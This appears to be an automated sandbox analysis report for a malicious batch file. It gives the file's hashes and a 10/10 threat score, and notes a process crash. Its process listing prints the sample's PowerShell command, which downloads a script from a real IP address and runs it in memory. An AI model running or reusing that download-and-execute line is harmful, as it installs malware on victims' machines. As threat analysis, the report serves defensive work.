Analysis
-
max time kernel
134s -
max time network
69s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
20-05-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
a1ced45242d2149282fc0a7230280012.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
a1ced45242d2149282fc0a7230280012.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
a1ced45242d2149282fc0a7230280012.bat
-
Size
217B
-
MD5
41b00aedcf17cecfbeb6362ce3bcd14f
-
SHA1
c18a004d285abadf2b5840c9bb31c5cb9ae3a80c
-
SHA256
33347fdae792b3a0eb66bd0476b6ddcfb4aa1334e8a0de8a7f0aa8b2d07daa50
-
SHA512
1f0c5e210b4485ba274345201f4e5e5a5c30e5d217a347835ff2e759a8522f322d7428d33b9a529ad134930f9d65ccf642f8c84be93dc8cca8aeac40061ec455
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1872 900 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1872 WerFault.exe Token: SeBackupPrivilege 1872 WerFault.exe Token: SeDebugPrivilege 1872 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe 1872 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a1ced45242d2149282fc0a7230280012.bat"1⤵PID:896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012');Invoke-KZMZWDCRYF;Start-Sleep -s 10000"2⤵PID:900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1872